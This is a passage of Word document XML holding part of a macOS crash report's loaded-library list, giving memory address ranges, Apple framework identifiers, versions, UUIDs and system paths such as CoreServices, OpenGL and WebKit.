        <w:t xml:space="preserve">    0x7fffbd88a000 -     0x7fffbd8d5ff7  com.apple.CoreMediaIO (803.0 - 4927) &lt;C237F327-930D-30E7-A100-D60F28911154&gt; /System/Library/Frameworks/CoreMediaIO.framework/Versions/A/CoreMediaIO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbd8d6000 -     0x7fffbd8d6fff  com.apple.CoreServices (775.8.2 - 775.8.2) &lt;FE7B0765-C41F-3FD9-8FD7-094466AAD0EB&gt; /System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbd8d7000 -     0x7fffbd928ff7  com.apple.AE (712 - 712) &lt;0EF17D7E-6BA4-3555-BC38-9BD0CC5B82A3&gt; /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/AE.framework/Versions/A/AE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbd929000 -     0x7fffbdc04fff  com.apple.CoreServices.CarbonCore (1159 - 1159) &lt;837B7ECF-7E62-3210-988C-63D7AB4EAA88&gt; /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/CarbonCore.framework/Versions/A/CarbonCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbdc05000 -     0x7fffbdc38fff  com.apple.DictionaryServices (1.2 - 274) &lt;302B8678-D057-3CF8-ACA7-7424A4A6A00A&gt; /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/DictionaryServices.framework/Versions/A/DictionaryServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbdc39000 -     0x7fffbdc41ffb  com.apple.CoreServices.FSEvents (1230 - 1230) &lt;8836E7D0-844F-36F9-9601-B630BB82336B&gt; /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/FSEvents.framework/Versions/A/FSEvents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbdc42000 -     0x7fffbddadfff  com.apple.LaunchServices (775.8.2 - 775.8.2) &lt;7389590A-0E30-3294-B39C-F179D237F6C4&gt; /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/LaunchServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbddae000 -     0x7fffbde5effb  com.apple.Metadata (10.7.0 - 1075.17) &lt;40F7E6E2-B58B-34E1-B97B-26756ECDB947&gt; </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/Metadata.framework/Versions/A/Metadata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbde5f000 -     0x7fffbdebefff  com.apple.CoreServices.OSServices (775.8.2 - 775.8.2) &lt;C949CF81-3510-3987-AEB4-9A961B738DA2&gt; /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/OSServices.framework/Versions/A/OSServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbdebf000 -     0x7fffbdf2ffff  com.apple.SearchKit (1.4.0 - 1.4.0) &lt;F1B3EF8D-E820-317C-AC7F-8F056C246874&gt; /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/SearchKit.framework/Versions/A/SearchKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbdf30000 -     0x7fffbdf76ff7  com.apple.coreservices.SharedFileList (38 - 38) &lt;6C5A3FBB-9502-3725-AC3A-AE7B1528BBD4&gt; /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/SharedFileList.framework/Versions/A/SharedFileList</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbe003000 -     0x7fffbe14effb  com.apple.CoreText (352.0 - 544.1) &lt;3229A726-303B-3B09-A014-8708C3BEF2D1&gt; /System/Library/Frameworks/CoreText.framework/Versions/A/CoreText</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbe14f000 -     0x7fffbe184fff  com.apple.CoreVideo (1.8 - 234.0) &lt;48C31E93-87C2-31F4-97E7-9E54C1EA8E7D&gt; /System/Library/Frameworks/CoreVideo.framework/Versions/A/CoreVideo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbe185000 -     0x7fffbe1f6ffb  com.apple.framework.CoreWLAN (11.0 - 1200.25.1) &lt;0425CA71-50D9-32DC-8693-CAE6CB3B799D&gt; /System/Library/Frameworks/CoreWLAN.framework/Versions/A/CoreWLAN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbe226000 -     0x7fffbe231ff3  com.apple.DirectoryService.Framework (10.12 - 194) &lt;829AFAAD-5742-332D-B84D-AF161FB57660&gt; /System/Library/Frameworks/DirectoryService.framework/Versions/A/DirectoryService</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbe2f1000 -     0x7fffbe2f6fff  com.apple.DiskArbitration (2.7 - 2.7) &lt;566D5C06-13E8-3638-B2EC-2B834D5F04F1&gt; /System/Library/Frameworks/DiskArbitration.framework/Versions/A/DiskArbitration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbe485000 -     0x7fffbe82cffb  com.apple.Foundation (6.9 - 1349) &lt;08A463B1-296E-3AC1-B8D3-01A75B0785A8&gt; /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x7fffbe858000 -     0x7fffbe889fff  com.apple.GSS (4.0 - 2.0) &lt;4F3C9982-457C-3731-85DB-8CE1A72621B0&gt; /System/Library/Frameworks/GSS.framework/Versions/A/GSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbe93d000 -     0x7fffbe9e0fff  com.apple.Bluetooth (5.0.1 - 5.0.1f7) &lt;406E3901-F5D3-3996-84F7-32975EBE8F86&gt; /System/Library/Frameworks/IOBluetooth.framework/Versions/A/IOBluetooth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbe9e1000 -     0x7fffbea76ff7  com.apple.framework.IOKit (2.0.2 - 1324.21.1) &lt;EEFE7FF0-CE41-326A-A571-8AA0B2E89271&gt; /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbea77000 -     0x7fffbea7dffb  com.apple.IOSurface (153.1 - 153.1) &lt;849B0928-3D37-3977-9670-19979DB4EE4D&gt; /System/Library/Frameworks/IOSurface.framework/Versions/A/IOSurface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbea7e000 -     0x7fffbead0ffb  com.apple.ImageCaptureCore (7.0 - 7.0) &lt;B12559B1-A73A-301C-9628-27F4A765C6DF&gt; /System/Library/Frameworks/ImageCaptureCore.framework/Versions/A/ImageCaptureCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbead1000 -     0x7fffbec27fef  com.apple.ImageIO.framework (3.3.0 - 1570.2) &lt;1133B1CE-C702-3D66-80F3-6BB40D5D1178&gt; /System/Library/Frameworks/ImageIO.framework/Versions/A/ImageIO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbec28000 -     0x7fffbec2cfff  libGIF.dylib (1570.2) &lt;4AE8D51B-E26A-3CB0-9D53-58112F94E3CE&gt; /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libGIF.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbec2d000 -     0x7fffbed1dfff  libJP2.dylib (1570.2) &lt;9F56888C-28CD-3ED0-B7BB-FFB775EF9DE7&gt; /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libJP2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbed1e000 -     0x7fffbed41ffb  libJPEG.dylib (1570.2) &lt;BE6386AF-E7F7-3C26-8B9E-7682DA38F496&gt; /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libJPEG.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbed42000 -     0x7fffbed69ff7  libPng.dylib (1570.2) &lt;2BC453BB-5E15-3031-AFAE-912025F2674A&gt; /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libPng.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbed6a000 -     0x7fffbed6cff3  libRadiance.dylib (1570.2) &lt;0F2C81F9-2D74-36A6-BCC0-2366E60410C7&gt; /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libRadiance.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x7fffbed6d000 -     0x7fffbedc6ff3  libTIFF.dylib (1570.2) &lt;897EB69A-1C96-3BC2-A458-A21652249E71&gt; /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libTIFF.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbeee6000 -     0x7fffbf987ff7  com.apple.JavaScriptCore (12602 - 12602.2.14.0.5) &lt;A9839022-B3BE-38E2-8956-B5ED9BE145FD&gt; /System/Library/Frameworks/JavaScriptCore.framework/Versions/A/JavaScriptCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbf988000 -     0x7fffbf9a1ff7  com.apple.Kerberos (3.0 - 1) &lt;49DCBE1A-130C-3FBF-AAEA-AF9A518913AC&gt; /System/Library/Frameworks/Kerberos.framework/Versions/A/Kerberos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbf9a2000 -     0x7fffbf9d8fff  com.apple.LDAPFramework (2.4.28 - 194.5) &lt;850BB4C5-2548-33A5-B00C-0600CA59EE59&gt; /System/Library/Frameworks/LDAP.framework/Versions/A/LDAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbfc1c000 -     0x7fffbfc22fff  com.apple.MediaAccessibility (1.0 - 97.1.1) &lt;EE1825C7-3B58-32F8-9F5F-B7172452BB01&gt; /System/Library/Frameworks/MediaAccessibility.framework/Versions/A/MediaAccessibility</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffbfc38000 -     0x7fffc0187ff7  com.apple.MediaToolbox (1.0 - 1903.11) &lt;9855FD27-8435-3CB5-8C81-342D3BED69DE&gt; /System/Library/Frameworks/MediaToolbox.framework/Versions/A/MediaToolbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc0188000 -     0x7fffc01dfff7  com.apple.Metal (85.85 - 85.85) &lt;EF221C0E-9638-312B-9455-FF3C69180C45&gt; /System/Library/Frameworks/Metal.framework/Versions/A/Metal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc08f5000 -     0x7fffc08fdfff  com.apple.NetFS (6.0 - 4.0) &lt;6614F9B8-0861-338B-8FF0-8E402F96141C&gt; /System/Library/Frameworks/NetFS.framework/Versions/A/NetFS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc0ca2000 -     0x7fffc0cf0ff3  com.apple.opencl (2.8.6 - 2.8.6) &lt;819DE36A-893E-3100-8430-EEB9D7023672&gt; /System/Library/Frameworks/OpenCL.framework/Versions/A/OpenCL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc0cf1000 -     0x7fffc0d0affb  com.apple.CFOpenDirectory (10.12 - 194) &lt;BDD22B3E-4149-366A-A974-942280861DD4&gt; /System/Library/Frameworks/OpenDirectory.framework/Versions/A/Frameworks/CFOpenDirectory.framework/Versions/A/CFOpenDirectory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x7fffc0d0b000 -     0x7fffc0d16ff7  com.apple.OpenDirectory (10.12 - 194) &lt;E1125140-E42C-369C-8DC8-D0935767B275&gt; /System/Library/Frameworks/OpenDirectory.framework/Versions/A/OpenDirectory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc0d17000 -     0x7fffc0d19fff  libCVMSPluginSupport.dylib (12.4.5) &lt;AF349AF5-ACC9-32C8-98BE-1DC9523156C5&gt; /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libCVMSPluginSupport.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc0d1a000 -     0x7fffc0d1dff7  libCoreFSCache.dylib (150) &lt;991F00EB-B1B4-3351-9D83-C11E4920C360&gt; /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libCoreFSCache.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc0d1e000 -     0x7fffc0d21fff  libCoreVMClient.dylib (150) &lt;06276E05-1FB2-3748-A236-1F66468A1755&gt; /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libCoreVMClient.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc0d22000 -     0x7fffc0d2affb  libGFXShared.dylib (12.4.5) &lt;67ABA30E-DA8A-336C-8137-11CD0D455741&gt; /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGFXShared.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc0d2b000 -     0x7fffc0d36fff  libGL.dylib (12.4.5) &lt;920D2CC5-D64F-35A5-8C54-4A5731AEC552&gt; /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGL.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc0d37000 -     0x7fffc0d73ff7  libGLImage.dylib (12.4.5) &lt;BEDFA6BF-0D9C-35ED-9DDD-FDBB1F6AAF95&gt; /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLImage.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc0eeb000 -     0x7fffc0f2bff3  libGLU.dylib (12.4.5) &lt;79C811DC-7904-3A7D-A983-B3E8D5439336&gt; /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLU.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc1893000 -     0x7fffc18a1fff  com.apple.opengl (12.4.5 - 12.4.5) &lt;B33F90DE-B86B-38E3-BCDB-5C8B4952D84B&gt; /System/Library/Frameworks/OpenGL.framework/Versions/A/OpenGL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc1b0a000 -     0x7fffc1c51ff7  com.apple.QTKit (7.7.3 - 2978) &lt;BA342B9F-7675-3A1D-B384-BB0B78F3F207&gt; /System/Library/Frameworks/QTKit.framework/Versions/A/QTKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x7fffc1c52000 -     0x7fffc1ebdfff  com.apple.imageKit (3.0 - 1016) &lt;A3D24043-95CD-3A40-9850-83E02BDF56D0&gt; /System/Library/Frameworks/Quartz.framework/Versions/A/Frameworks/ImageKit.framework/Versions/A/ImageKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc1ebe000 -     0x7fffc1f78ff7  com.apple.PDFKit (1.0 - 1) &lt;C9AB4AB5-A2E4-344E-B898-097B86DD38D6&gt; /System/Library/Frameworks/Quartz.framework/Versions/A/Frameworks/PDFKit.framework/Versions/A/PDFKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc1f79000 -     0x7fffc249ffff  com.apple.QuartzComposer (5.1 - 351) &lt;10A260C7-A44C-3C64-BF68-FC0FCCD08489&gt; /System/Library/Frameworks/Quartz.framework/Versions/A/Frameworks/QuartzComposer.framework/Versions/A/QuartzComposer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc24a0000 -     0x7fffc24c3ffb  com.apple.quartzfilters (1.10.0 - 1.10.0) &lt;9ECD9812-151A-300D-8F37-F7FEBE67B8BC&gt; /System/Library/Frameworks/Quartz.framework/Versions/A/Frameworks/QuartzFilters.framework/Versions/A/QuartzFilters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc24c4000 -     0x7fffc25b1ff7  com.apple.QuickLookUIFramework (5.0 - 720.1) &lt;6967F937-2BDC-397A-A377-5C52899FF97A&gt; /System/Library/Frameworks/Quartz.framework/Versions/A/Frameworks/QuickLookUI.framework/Versions/A/QuickLookUI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc25b2000 -     0x7fffc25b2fff  com.apple.quartzframework (1.5 - 21) &lt;09455972-8A33-3D61-B193-BA7E7CF984CA&gt; /System/Library/Frameworks/Quartz.framework/Versions/A/Quartz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc25b3000 -     0x7fffc27adfff  com.apple.QuartzCore (1.11 - 449.39.5) &lt;B1815529-31B4-3FD0-923D-C3E964F844FF&gt; /System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc27ae000 -     0x7fffc2803fff  com.apple.QuickLookFramework (5.0 - 720.1) &lt;FF21C563-BCEB-390B-8120-FE5FE788DBDF&gt; /System/Library/Frameworks/QuickLook.framework/Versions/A/QuickLook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc2804000 -     0x7fffc2817ff7  com.apple.SafariServices.framework (12602 - 12602.2.14.0.7) &lt;2F16B32F-D006-31EA-9CB9-299264C17E30&gt; /System/Library/Frameworks/SafariServices.framework/Versions/A/SafariServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x7fffc2d13000 -     0x7fffc302eff7  com.apple.security (7.0 - 57740.20.22) &lt;7E95D13A-0D52-36A9-A1C4-C21EE26AB2AB&gt; /System/Library/Frameworks/Security.framework/Versions/A/Security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc302f000 -     0x7fffc30a5ff7  com.apple.securityfoundation (6.0 - 55132.20.1) &lt;8DDEA805-C6F7-3EF9-990F-136617DB942D&gt; /System/Library/Frameworks/SecurityFoundation.framework/Versions/A/SecurityFoundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc30a6000 -     0x7fffc30cefff  com.apple.securityinterface (10.0 - 55079.1.1) &lt;F6B71377-6CF3-3E55-B20F-77F3C76FC9A4&gt; /System/Library/Frameworks/SecurityInterface.framework/Versions/A/SecurityInterface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc30cf000 -     0x7fffc30d2ff3  com.apple.xpc.ServiceManagement (1.0 - 1) &lt;A88DACDF-71A9-3974-8D8D-DAA2B64F2CA5&gt; /System/Library/Frameworks/ServiceManagement.framework/Versions/A/ServiceManagement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc3457000 -     0x7fffc34c8ff7  com.apple.SystemConfiguration (1.14 - 1.14) &lt;013957CA-2708-31F0-845D-11E271C96B94&gt; /System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc34c9000 -     0x7fffc3874ff7  com.apple.VideoToolbox (1.0 - 1903.11) &lt;E59DEC1D-6E7D-39BB-A589-9166C3C79221&gt; /System/Library/Frameworks/VideoToolbox.framework/Versions/A/VideoToolbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc3875000 -     0x7fffc4aa9ff3  com.apple.WebCore (12602 - 12602.2.14.0.5) &lt;AA349DE2-73A3-32B2-8A1D-FEFFC468B87D&gt; /System/Library/Frameworks/WebKit.framework/Versions/A/Frameworks/WebCore.framework/Versions/A/WebCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc4aaa000 -     0x7fffc4c0ffff  com.apple.WebKitLegacy (12602 - 12602.2.14.0.7) &lt;3D4BAC77-370A-3D55-AD1A-68D4C489DAF1&gt; /System/Library/Frameworks/WebKit.framework/Versions/A/Frameworks/WebKitLegacy.framework/Versions/A/WebKitLegacy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc4c10000 -     0x7fffc4f7bff7  com.apple.WebKit (12602 - 12602.2.14.0.7) &lt;847FBE4F-06E5-315F-80FA-A58180B74608&gt; /System/Library/Frameworks/WebKit.framework/Versions/A/WebKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x7fffc5ae0000 -     0x7fffc5afbff3  com.apple.AppContainer (4.0 - 307.20.1) &lt;AE48030D-760D-3C46-A5EB-FD09B42543ED&gt; /System/Library/PrivateFrameworks/AppContainer.framework/Versions/A/AppContainer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc5afc000 -     0x7fffc5b09ff3  com.apple.AppSandbox (4.0 - 307.20.1) &lt;6BCD6C7F-470A-3C6A-9A24-3F26037AD6F7&gt; /System/Library/PrivateFrameworks/AppSandbox.framework/Versions/A/AppSandbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc5b0a000 -     0x7fffc5b2cffb  com.apple.framework.Apple80211 (12.0 - 1200.37) &lt;25299C0F-7A30-3BAA-9945-DB1515F68A2C&gt; /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Apple80211</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc5b2d000 -     0x7fffc5b3cfdb  com.apple.AppleFSCompression (88 - 1.0) &lt;D3A6F5F9-2132-34B5-933F-DF5D6733DE8B&gt; /System/Library/PrivateFrameworks/AppleFSCompression.framework/Versions/A/AppleFSCompression</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
